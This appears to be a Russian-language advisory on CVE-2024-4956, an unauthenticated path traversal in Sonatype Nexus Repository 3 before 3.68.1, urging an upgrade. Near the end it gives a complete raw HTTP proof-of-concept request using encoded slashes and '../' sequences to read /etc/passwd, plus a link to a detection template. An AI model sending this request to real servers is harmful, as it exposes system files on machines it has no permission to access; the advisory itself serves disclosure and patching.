
Неаутентифицированный обход пути в Nexus Repository 3
Nexus Repository Manager — это менеджер репозиториев, который организует, хранит и распространяет артефакты, необходимые для разработки.
Уязвимость обхода пути была обнаружена в Nexus Repository 3, в версиях до 3.68.1. Эта уязвимость позволяет злоумышленнику создать URL для загрузки системных файлов за пределами области действия приложения Nexus Repository, без какой-либо аутентификации. Это представляет значительный риск, так как может привести к раскрытию чувствительных системных файлов и потенциально скомпрометировать безопасность среды, где установлен Nexus Repository.
Рекомендуется как можно скорее обновить Nexus Repository до версии 3.68.1 или новее, чтобы устранить эту уязвимость.
Для получения дополнительной информации и технических деталей об уязвимости, пожалуйста, обратитесь по следующей ссылке:
Ссылки:
Уязвимость затрагивает версии с 3.0 по 3.68.0 Sonatype Nexus Repository Manager.
Обновление Nexus Repository является рекомендуемым способом устранения этой уязвимости. Однако для развертываний, которые не могут быть немедленно обновлены, доступны варианты оперативного смягчения:
Ссылки:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
С помощью приведенного выше PoC можно увидеть доступ к файлу /etc/passwd:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml